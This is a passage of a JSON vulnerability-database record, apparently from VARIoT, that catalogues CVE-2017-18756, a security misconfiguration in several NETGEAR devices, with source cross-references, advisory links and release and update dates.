"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18756"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000051492/security-advisory-for-security-misconfiguration-on-some-routers-gateways-and-extenders-psv-2017-2756"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18756"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-13201"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014942"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1930"
},
{
"db": "NVD",
"id": "CVE-2017-18756"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2022-13201"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014942"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1930"
},
{
"db": "NVD",
"id": "CVE-2017-18756"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-02-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-13201"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014942"
},
{
"date": "2020-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1930"
},
{
"date": "2020-04-22T17:15:11.870000",
"db": "NVD",
"id": "CVE-2017-18756"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-02-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-13201"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014942"
},
{
"date": "2020-04-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1930"
},
{
"date": "2024-11-21T03:20:50.677000",
"db": "NVD",
"id": "CVE-2017-18756"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1930"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014942"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1930"
}
],
"trust": 0.6
}
}